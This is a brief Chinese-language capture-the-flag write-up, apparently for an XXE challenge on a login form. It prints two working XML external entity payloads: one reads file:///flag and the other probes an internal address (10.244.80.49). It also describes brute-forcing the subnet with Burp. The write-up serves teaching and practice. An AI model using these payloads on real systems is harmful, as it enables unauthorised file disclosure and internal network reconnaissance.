打开题目
看到登录口
随便输入admin,123456,然后抓包试一下
先按原来那道题的payload进行测试,payload和结果如下:
<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>1</password>
</user>
未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息
这里获得一个新的地址,尝试下进行连接结果如下:
<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM "http://10.244.80.49/">
]>
<user>
<username>&file;</username>
<password>1</password>
</user>
连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:
扫描可得到flag